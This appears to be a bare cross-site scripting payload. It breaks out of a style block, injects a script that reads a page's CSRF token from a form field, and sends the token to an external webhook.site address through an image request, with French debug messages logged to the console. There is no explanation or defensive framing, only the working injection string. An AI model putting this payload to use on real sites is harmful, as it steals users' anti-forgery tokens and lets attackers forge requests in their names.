body{}
</style>
<script>
console.log('BINGO');
(function(){
    var token = document.querySelector('input[name="csrf"]').value;
    console.log('Token:', token);
    var img = new Image();
    img.src = 'https://webhook.site/d8c4e072-db69-4df8-a664-a12d7734f709?token=' + encodeURIComponent(token);
    console.log('Requete envoyee');
})();
</script>
<style>
body{}